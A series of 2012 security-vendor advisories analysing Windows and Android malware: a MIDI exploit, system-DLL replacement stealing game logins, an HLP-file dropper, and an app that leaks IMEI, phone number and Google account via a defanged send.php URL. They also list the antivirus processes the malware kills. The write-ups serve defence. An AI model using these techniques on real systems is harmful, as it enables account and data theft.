12345

1/27/2012

[Warning] Malicious files using MIDI exploit

1. Introduction

We found malicious file which uses MS12-004(CVE-2012-0003), one of MS security update on Jan 2012.
This security vulnerability is known that Shane Garrett of IBM Security System X-orce Research reported MS on Jan 10 2012.
It uses remote code execution vulnerability located on winmm.dll, MS Windows multimedia library for media player.
To maintain MS latest security update can protect against this exploit.
We need to protect our PC from this malicious file which is using MIDI remote code vulnerability.



2. Vulnerability information

When a malicious media file, created by malicious attacker, is played, remote code execution is allowed. Then, attacker can get permission same as local user's.

Microsoft Windows Media Could Allow Remote Code Execution
http://www.iss.net/threats/442.html

Vulnerabilities in Windows Media Could Allow Remote Code Execution
http://technet.microsoft.com/ko-kr/security/bulletin/MS12-004

Malware Leveraging MIDI Remote Code Execution Vulnerability Found
http://blog.trendmicro.com/malware-leveraging-midi-remote-code-execution-vulnerability-found/

Following list is the set of affected software.

- Windows XP SP3 Windows Multimedia Library
- Windows XP Media Center Edition 2005 SP3 Windows Multimedia Library
- Windows XP Media Center Edition 2005 SP3 Windows Multimedia Library and Directshow
- Windows XP Professional x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 with SP2 for Itanium-based Systems Windows Multimedia Library and DirectShow
- Windows Vista SP2 Windows Multimedia Library and DirectShow
- Windows Vista x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for 32-bit Systems SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for x64-based Systems SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for Itanium-based Systems SP2 Windows Multimedia Library and DirectShow
- Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems SP1 DirectShow
- Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1 DirectShow
- Windows Server 2008 R2 for x64-based Systems DirectShow
- Windows Server 2008 R2 for x64-based Systems SP1 DirectShow
- Windows Server 2008 R2 for Itanium-based Systems DirectShow
- Windows Server 2008 R2 for Itanium-based Systems SP1 DirectShow

3. Malicious file using MIDI exploit

This file, found as a "mp.html" at first time, used MIDI vulnerability.
The name "mp" seems to be a shorten form of Media Player, and it plays baby.mid, which uses MIDI exploit, with object command.


Besides it executes ActiveXObject code with using i.js(JScript file) and executes Shell Code values with Java Script.

Furthermore, when baby.mid is loaded, the title song of "TOTORO"(Japanese Animation) will be played and user's PC will be infected.


When Shell Code value, encrypted by security exploit, is executed, tdc.exe will be downloaded from certain web site.
This file will be decrypted with various procedures including XOR and will be executed.


When malicious tdc.exe is executed, "20120120.exe" will be downloaded and executed from certain external web site.

Our nProtect AVS3.0 can detect it

4. How to prevent

This kind of malicious file is aiming as many users as it can with using latest security exploit.
To be safe from this malicious file, we must keep our PC on latest security update.
Not only from the MS web site, we have to visit our product's official web site to check security update.


To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.

1/18/2012

[Warning] Malicious file changing version.dll

1. Introduction

INCA Internet Security Response Center's Emergency Response Team detected malicious file which changes original version.dll, one of system files, to malicious file for domestic users on Jan 14, 2012.
This kind of malicious files remained various types. The most recent one was that changing ws2help.dll to malicious file.
As you know, system files are usually using on booting, and malicious system file can cause reboot infinitely.
Especially, these malicious files are spreading on weekend via famous file sharing web sites, and they can infect with various vulnerabilities.


 
Malicious attackers are aiming at internet news site, file sharing service, and forums for users whose PC are weak at security vulnerability.

[Warning] Malicious file which changes ws2help.dll(System file)
http://en-erteam.nprotect.com/2012/01/warning-malicious-file-which-changes.html 

Furthermore, it calculates real-time statistics of infected user and collects OS version info and Anti-virus SW info.

2. Infection details

This malicious file changes version.dll(Version Checking and File Installation Libraries) to malicious file and renames original version.dll to version32.dll. And then, malicious version.dll file make version32.dll(original one) to be used on boot.

First of all, it runs following procedure when host malicious file is executed, and it changes normal version.dll to malicious file(On Windows XP SP3 Korean)

A. Creates malicious file on C:\Windows\System32\safemon.dll
B. Creates malicious file on C:\Documents and Settings\[user account]\Local Settings\Temp\201211891054.dll
* Created dll file name uses this format "yyyymmddhhmmss".

C. Renames original version.dll to C:\Windows\System32\version32.dll
D. Changes C:\Windows\System32\version.dll to C:\Windows\System32\201211891054.dll (malicious file)
* Normal version.dll file will be changed malicious version.dll file.

E. Creates voor.bat, removes host exe file and voor.bat file.


Maliciously changed version.dll is forwarding its Export address to version32.dll, which works on boot itself and tries to steal online game account.



Malicious safemon.dll registers itself as a BHO (Browser Helper Objects) using registry. In this process, existing BHO values can be removed.
Once it is registered as a BHO object, malicious file will be run along with IE(Internet Explorer).

- Function name : Broswer helper object
- Data : IEHlprObj Class
- CLSID : {D36F9CA2-788F-42DE-A627-9E6EF40D8475}
- file name : C:\WINDOWS\system32\safemon.dll

- Register value : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}


Malicious safemon.dll is disguised as a update module of Alyac product file, and it tries to breach user account and password on browser.


List of target sites

aion.plaync.jp
baram.nexon.com
booknlife.com
capogames.net
clubaudition.ndolfin.com
cultureland.co.kr
df.nexon.com
dragonnest.nexon.com
elsword.nexon.com
fifaonline.pmang.com
hangame.com
happymoney.co.kr
id.hangame.com
itembay.com
itemmania.com
maplestory.nexon.com
netmarble.net
plaync.co.kr
pmang.com
pmang.com/game_top.nwz?ssn
pmang.com/game_top.nwz?ssn=14
pmang.com/game_top.nwz?ssn=17
pmang.com/game_top.nwz?ssn=18
pmang.com/game_top.nwz?ssn=19
pmang.com/game_top.nwz?ssn=2
pmang.com/game_top.nwz?ssn=23
pmang.com/game_top.nwz?ssn=24
pmang.com/game_top.nwz?ssn=25
pmang.com/game_top.nwz?ssn=26
pmang.com/game_top.nwz?ssn=3
pmang.com/game_top.nwz?ssn=40
pmang.com/game_top.nwz?ssn=43
poker.hangame.com/baduki.nhn
poker.hangame.com/duelpoker.nhn
poker.hangame.com/highlow2.nhn
poker.hangame.com/hoola3.nhn
poker.hangame.com/laspoker.nhn
poker.hangame.com/poker7.nhn
samwinfo.capogames.net
teencash.co.kr
tera.hangame.com

Changed version.dll as a malicious file works to bother Anti-Virus SWs and tries to kill certain process.

[Korean product]
- ALYac : AYAgent.aye, AYUpdSrv.aye, AYRTSrv.aye
- Naver : NaverAgent.exe
- AhnLab SiteGuard : SgRun.exe, SgSvc.exe, Sgui.exe
- AhnLab V3 Lite : V3LTray.exe, V3LRun.exe, V3LSvc.exe

[Overseas product]
- AVAST : AvastUI.exe, ashUpd.exe, AvastSvc.exe, avwsc.exe
- AVG : avgupd.exe, avgwdsvc.exe, avgfrw.exe, avgrsx.exe, avgnsx.exe, avgemc.exe, avgam.exe
- AVIRA : avupgsvc.exe, avscan.exe, avguard.exe, avcenter.exe, avgnt.exe
- BitDefender : bdreinit.exe, bdagent.exe, seccenter.exe, vsserv.exe, updatesrv.exe
- Kaspersky : avp.exe
- McAfee : UdaterUI.exe, Mctray.exe, shstat.exe
- Microsoft : msseces.exe
- Eset : ekrn.exe, egui.exe
- Symantec : Navw32.exe, ccSvcHst.exe

If infected system has installation of Alyac, V3 product, it changes driver files to temp. File name changing sequence is SrMac(number).dat , see the following file list.

[V3 product]
- AhnFlt2k.sys
- AhnFltNt.sys
- AhnRec2k.sys
- AhnRecNt.sys
- AhnRghNt.sys
- ahnsze.sys
- v3core.sys
- v3engine.sys

[Alyac product]
- EstRtw.sys

3. How to prevent manually

Close applications for interrupt. Changing malicious files' extension and removing malicious registry value can make infected PC safe from malicious files.

A. Rename C:\Windows\System32\version.dll.
ex) version.dll-> version.dll-

Normal version.dll file : 18,994 bytes
Malicious version.dll file : 66,560 bytes (depends on its variants)


B. WFP(Windows File Protection) will recover normal version.dll file from (C:\Windows\System32\dllcache\version.dll).


Since malicious file(version.dll-) is running, it can be removed after reboot.


C. In case of safemon.dll, it runs along with Explorer.exe. So, it can't be removed immediately. To erase safemon.dll, force kill Explorer.exe file or rename file name as following then reboot and remove.
ex) safemon.dll-> safemon.dll-


D. Remove malicious registry values.



Following lists of registry values need to be removed.

- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_DLL
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_ID
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj.1
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D36F9CA1-788F-42DE-A627-9E6EF40D8475}
- HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{D36F9CA8-788F-42DE-A627-9E6EF40D8475}
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D36F9CA2-788F-42DE-A627-9E6EF40D8475}

E. Reboot and remove following files.

- C:\Documents and Settings\user account\Local Settings\Temp\2012(mmddhhmmss).dll-
- C:\WINDOWS\system32\2012(mmddhhmmss).dll
- C:\WINDOWS\system32\safemon.dll-
- C:\WINDOWS\system32\version32.dll
- C:\WINDOWS\system32\version.dll-

4. How to prevent

We mentioned these malicious files which can cause various damage cases(including stealing online game account information and unknown quit of IE while using internet banking) and wide infection range.

Get the latest version on following URL


To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.

1/11/2012

Microsoft Security Bulletin Summary for January 2012

1. Introduction

Microsoft(MS)'s regular security updates were released for January 2012.
Users who use MS OS strongly recommended update to be safe from Windows Kernel SafeSEH Bypass Vulnerability, Object Packager Insecure Executable Launching Vulnerability, CSRSS Elevation of Privilege Vulnerability, MIDI Remote Code Execution Vulnerability, DirectShow Remote Code Execution Vulnerability, Assembly Execution Vulnerability, SSL and TLS Protocols Vulnerability, and AntiXSS Library Bypass Vulnerability.



2. Update details

[Important]
[MS12-001] Vulnerability in Windows Kernel Could Allow Security Feature Bypass (2644615)

Vulnerability: Windows Kernel SafeSEH Bypass Vulnerability- CVE-2012-0001

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow an attacker to bypass the SafeSEH security feature in a software application. An attacker could then use other vulnerabilities to leverage the structured exception handler to run arbitrary code. Only software applications that were compiled using Microsoft Visual C++ .NET 2003 can be used to exploit this vulnerability.

Affected Softwares

- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based
- Windows Vista SP1
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows Server 2008 for 32bit and Windows 2008 for 32bit SP2
- Windows Server 2008 for x64-based and Windows Server 2008 for x64-based SP2
- Windows Server 2008 for Itanium-based and Windows Server 2008 for Itanium SP2
- Windows 7 for 32-bit and Windows 7 for 32bit SP1
- Windows 7 for x64-based and Windows 7 for x64-based SP1
- Windows Server 2008 R2 for x64-based and Windows Server R2 for x64-based SP1
- Windows Server 2008 R2 for Itanium-based and Windows Server 2008 R2 for Itanium SP1

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-001



[Important]
[MS12-002] Vulnerability in Windows Object Packager Could Allow Remote Code Execution (2603381)

Vulnerability: Object Packager Insecure Executable Launching Vulnerability- CVE-2012-0009

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a legitimate file with an embedded packaged object that is located in the same network directory as a specially crafted executable file. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Affected Softwares

- Windows XP SP3
- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-002



[Important]
[MS12-003] Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2646524)

Vulnerability: CSRSS Elevation of Privilege Vulnerability- CVE-2012-0005

This security update resolves one privately reported vulnerability in Microsoft Windows. This security update is rated Important for all supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. All supported editions of Windows 7 and Windows Server 2008 R2 are not affected by this vulnerability.

Affected Softwares

- Windows XP SP3
- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based
- Windows Vista SP1
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows Server 2008 for 32bit and Windows 2008 for 32bit SP2
- Windows Server 2008 for x64-based and Windows Server 2008 for x64-based SP2
- Windows Server 2008 for Itanium-based and Windows Server 2008 for Itanium SP2

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-003



[Critical]
[MS12-004] Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391)

Vulnerability: MIDI Remote Code Execution Vulnerability- CVE-2012-0003
DirectShow Remote Code Execution Vulnerability- CVE-2012-0004    
            
This security update resolves two privately reported vulnerabilities in Microsoft Windows. The vulnerabilities could allow remote code execution if a user opens a specially crafted media file. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Affected Softwares

- Windows XP SP3 Windows Multimedia Library
- Windows XP Media Center Edition 2005 SP3 Windows Multimedia Library
- Windows XP Media Center Edition 2005 SP3 Windows Multimedia Library and Directshow
- Windows XP Professional x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2003 with SP2 for Itanium-based Systems Windows Multimedia Library and DirectShow
- Windows Vista SP2 Windows Multimedia Library and DirectShow
- Windows Vista x64 Edition SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for 32-bit Systems SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for x64-based Systems SP2 Windows Multimedia Library and DirectShow
- Windows Server 2008 for Itanium-based Systems SP2 Windows Multimedia Library and DirectShow
- Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems SP1 DirectShow
- Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1 DirectShow
- Windows Server 2008 R2 for x64-based Systems DirectShow
- Windows Server 2008 R2 for x64-based Systems SP1 DirectShow
- Windows Server 2008 R2 for Itanium-based Systems DirectShow
- Windows Server 2008 R2 for Itanium-based Systems SP1 DirectShow

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-004



[Important]
[MS12-005] Vulnerability in Microsoft Windows Could Allow Remote Code Execution (2584146)

Vulnerability: Assembly Execution Vulnerability- CVE-2012-0013

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office file containing a malicious embedded ClickOnce application. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Affected Softwares

- Windows XP SP3
- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows Server 2008 for 32bit and Windows 2008 for 32bit SP2**
- Windows Server 2008 for x64-based and Windows Server 2008 for x64-based SP2**
- Windows Server 2008 for Itanium-based and Windows Server 2008 for Itanium SP2
- Windows 7 for 32-bit and Windows 7 for 32bit SP1
- Windows 7 for x64-based and Windows 7 for x64-based SP1
- Windows Server 2008 R2 for x64-based and Windows Server R2 for x64-based SP1**
- Windows Server 2008 R2 for Itanium-based and Windows Server 2008 R2 for Itanium SP1

**Server Core installation not affected. The vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, when installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-005



[Critical]
[MS12-006] Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)

Vulnerability: SSL and TLS Protocols Vulnerability- CVE-2011-3389

This security update resolves a publicly disclosed vulnerability in SSL 3.0 and TLS 1.0. This vulnerability affects the protocol itself and is not specific to the Windows operating system. The vulnerability could allow information disclosure if an attacker intercepts encrypted web traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected.

Affected Softwares

- Windows XP SP3
- Windows XP Professional x64 Edition SP2
- Windows Server 2003 SP2
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 SP2 Itanium-based
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows Server 2008 for 32bit and Windows 2008 for 32bit SP2
- Windows Server 2008 for x64-based and Windows Server 2008 for x64-based SP2
- Windows Server 2008 for Itanium-based and Windows Server 2008 for Itanium SP2
- Windows 7 for 32-bit and Windows 7 for 32bit SP1
- Windows 7 for x64-based and Windows 7 for x64-based SP1
- Windows Server 2008 R2 for x64-based and Windows Server R2 for x64-based SP1
- Windows Server 2008 R2 for Itanium-based and Windows Server 2008 R2 for Itanium SP1

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-006



[Important]
[MS12-007] Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664)

Vulnerability: AntiXSS Library Bypass Vulnerability- CVE-2012-0007

This security update resolves one privately reported vulnerability in the Microsoft Anti-Cross Site Scripting (AntiXSS) Library. The vulnerability could allow information disclosure if an attacker passes a malicious script to a website using the sanitization function of the AntiXSS Library. The consequences of the disclosure of that information depends on the nature of the information itself. Note that this vulnerability would not allow an attacker to execute code or to elevate the attacker's user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system. Only sites that use the sanitization module of the AntiXSS Library are affected by this vulnerability.
Affected Softwares
- Microsoft Anti-Cross Site Scripting Library V3.x and Microsoft Anti-Cross Site Scripting Library V4.0

- Reference site

http://technet.microsoft.com/en-us/security/bulletin/MS12-007

1/10/2012

[Warning] Android malicious file on Japanese porn site

1. Information

Few days ago, Android's malicious application's spread through file sharing site was big issue.
Officially, this was the first case of being found. INCA Internet Security Response Center's Emergency Response Team has detected malicious file aiming at Japanese users, so we want to share about that.
This malicious application has same symptom as found before in Korea.



Though, it doesn't have malicious purpose, just collecting information without user's decision can be harmful someday.

[Information] Automatic detection and analysis system of malicious Android application
http://en-erteam.nprotect.com/2011/12/information-automatic-detection-and.html

2. Spreading path and symptoms of infection

In case of this malicious APK file, there hasn't been reported specific damage case on Korea; however, it is just spreading on Japanese porn sites and it is added as a pattern of our Anti-Virus.

Spreading files through

Direct URL link on certain porn site
Disguised as an essential file on distributor's web site




Clicking URL on that site can download APK file.


User can download on Japanese porn site.


This malicious application requires some permissions as following.


Permission explanation

- android:name="android.permission.GET_ACCOUNTS"
- android:name="android.permission.INTERNET"

After installation, following run icon will be created. But it doesn't have its name.


Symptoms of infection

After the installation, executing malicious application will redirect user's page to payment.



Following is the sequence of malicious behaviors.

Malicious behaviors.

- Collects Google Email accounts
- Collects smartphone information including IMEI and contact
- Tries to leak to external site
- hxxp://(~).com/send.php?a_id=[IMEI]&telno=[telephone number]&m_addr=[Google Email account]&usr_id=[NULL]

It accesses porn site with that address and it registers receiver with following code.



We can check the receiver registering procedure. At this time, receiver checks certain service and if a certain service is performing, it tries to leak to external site.



Following capture is a procedure of dynamic debugging. Disclosure of information is forward "- hxxp://(~).com/send.php?a_id=[IMEI]&telno=[telephone number]&m_addr=[Google Email account]&usr_id=[NULL]"







3. How to prevent

In case of this malicious application, it aimed at Russia and China, however; it is spreading all over the world in these days. To use smartphone safely from security threats of these malicious applications, we recommend following tips "Smartphone security management tips" for general users.


Smartphone security management tips

1. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function
2. Download the proven application by multiple users at all times.
3. Use mobile anti-virus SW to check downloaded application before using it.
4. Do not visit suspicious or unknown site via smartphone.
5. Try not to see MMS, text, e-mail from uncertain user.
6. Set strong password on smartphone always.
7. Turn the wireless interfaces like Bluetooth only be used.
8. Do not save important information on phone.
9. Do not try illegal customizing like rooting or jailbreak.

INCA Internet (Security Response Center / Emergency Response Team) provides diagnosis/treatment function with “nProtect Mobile for Android” for mobile such as malicious file stated above and runs responding system against various security threats.

Diagnosis name
- Trojan/Android.Jporn.A

1/03/2012

[Warning] Malicious file is spreading through HLP file's exploit.

1. Information

INCA Internet Security Response Center's Emergency Response Team has detected malicious file using HLP(Help file)'s exploit.
Unlike executable files(EXE, SCR) or document files(HWP, DOC, PPT, XLS, PDF), using HLP exploit is uncommon.
Spreading malicious file through e-mail has been widely used.
Especially, some clever distributors use Zero-Day Exploit or social engineering.



 With using Microsoft OS/Application, Flash Player, and JAVA exploits, malicious attackers are trying to invade certain famous web site. Especially, malicious file spreading trend is becoming sophisticated psychological warfare.

[Warning] Malicious file masqueraded as a picture of Kim Jong Il's sister
http://en-erteam.nprotect.com/2011/12/warning-malicious-file-masqueraded-as.html

[Information] Continuous appearances of malicious file with using HWP exploit
http://en-erteam.nprotect.com/2011/11/information-continuous-appearance-of.html

2. HLP file exploit case

Following e-mail is reported that it was sent on December 29, 2011, and it induces user to open its attachment.


Attachment file "Call for Application at fundation.rar" contains a help file "Call for Applications at fundation.hlp".


Upon executed attachment file, it opens Windows help and contains aberrant characters and link (http://www.molihua.org).


This malicious file is coded to create and execute A.VBS from row 7 of Visual Basic Script with WScript.Shell command. Therefore, at the same time to see the help page, user's PC will be infected by malicious Script code.


Upon executed A.VBS, it will create setup.exe, which is performing as a root file, and will create folder "360" on Application data folder and install "Live360.exe". And then, A.VBS and setup.exe will be removed.


Live360.exe's icon is disguised as Word file of Microsoft. When it is executed, it will connect certain host in Shanghai (In China) and will be performed Command and Control(C&C) through winlogon.exe.

At the time we analyzed, malicious file was additionally infecting PASS.exe and tries to breach personal information including e-mail account saved as cache file.


Saved passwords were recorded on C:\Windows\System\xhyj.htm which collects Resource, Type, Account and Password and tries to breach external server.


3. How to prevent

To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.

1/02/2012

[Warning] Malicious file which changes ws2help.dll(System file)

1. Information

INCA Internet Security Response Center's Emergency Response Team has detected changing ws2help.dll to malicious file from Jan 1, 2012. Malicious hackers are still distributing new malicious files for obtaining online game user's account especially on weekends. It changes normal system file to malicious, and it disturbs regular work of some Anti-Virus products.
Furthermore, it uses Flash Player and JAVA exploit, users need to be careful on using internet and must up-to-date its latest security update.


Various Patched Type malicious files, which changes core system file of Windows OS, are spreading in South Korea, especially, changing ws2help.dll file to malicious is the most popular.

INCA Internet Security Response Center's Emergency Response Team detected malicious file which changes ws2help.dll to malicious file on internet news, file sharing site.

[Warning] An error occurred on booting while being infected tampering system files.
http://en-erteam.nprotect.com/2011/07/caution-error-occurred-on-booting-while.html

[Warning] A malicious file masqueraded as a Melon player is spreading.
http://en-erteam.nprotect.com/2011/06/warning-malicious-file-masqueraded-as.html

[Warning] Variant malicious files changing Windows system files are increasing
http://en-erteam.nprotect.com/2011/06/warning-variant-malicious-files.html

[Warning] Spreads various malicious file with being tampered Korean social commerce web site
http://en-erteam.nprotect.com/2011/06/warning-spreads-various-malicious-file.html


Since INCA Internet Security Response Center added "GD(Generic Detection)" function to determine various variants of malicious file on our product, our value user will be safe from its variants without latest pattern update.

◎ Trojan/W32.Forwarded.Gen

Malicious file distributors are continuously changing malicious file for bypass against Anti-Virus'
detection. INCA Internet Security Response Center is going along with that trend.

2. Spreading path and symptoms of infection

Former malicious file we detected on Feb and Mar 2011 was type of changing normal imm32.dll system file to malicious with executing all functions on system file of normal imm32.dll.
Another type was loading normal file which was changed its file name by Push -> Call command on Export functions.

Such as these examples above, patching system DLL file is prevalent, and some of malicious files causes unexpected exception on Anti-Debugging, then it can cause BSOD finally.

Following figure is forwarding procedure of ws3help.dll with using Export Address Table function of ws2help.dll.


Anti-Virus software must replace original system files on reboot while treating malicious ws2help.dll.
If it deletes replaced malicious file and does not replace, it can cause abnormal procedure.

These malicious files are spreading over news site, file sharing site, social commerce site, and forums especially on weekends.

Especially, using JAVA exploit is prevalent these days; therefore, users need to renew for latest update.

3. How to prevent

We have mentioned various damage cases such as stealing online game account information and unexpected IE quit.

To be safe from those threats, nProtect product added "2011-06-23.01 pattern version" and can detect with "Generic diagnosis/treat technique".

Following URLs are for official web site of each product.


To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

※ Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function “ON”
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

※ INCA Internet (Security Response Center / Emergency Response Team) provides Generic diagnosis/treat and runs responding system against various security threats.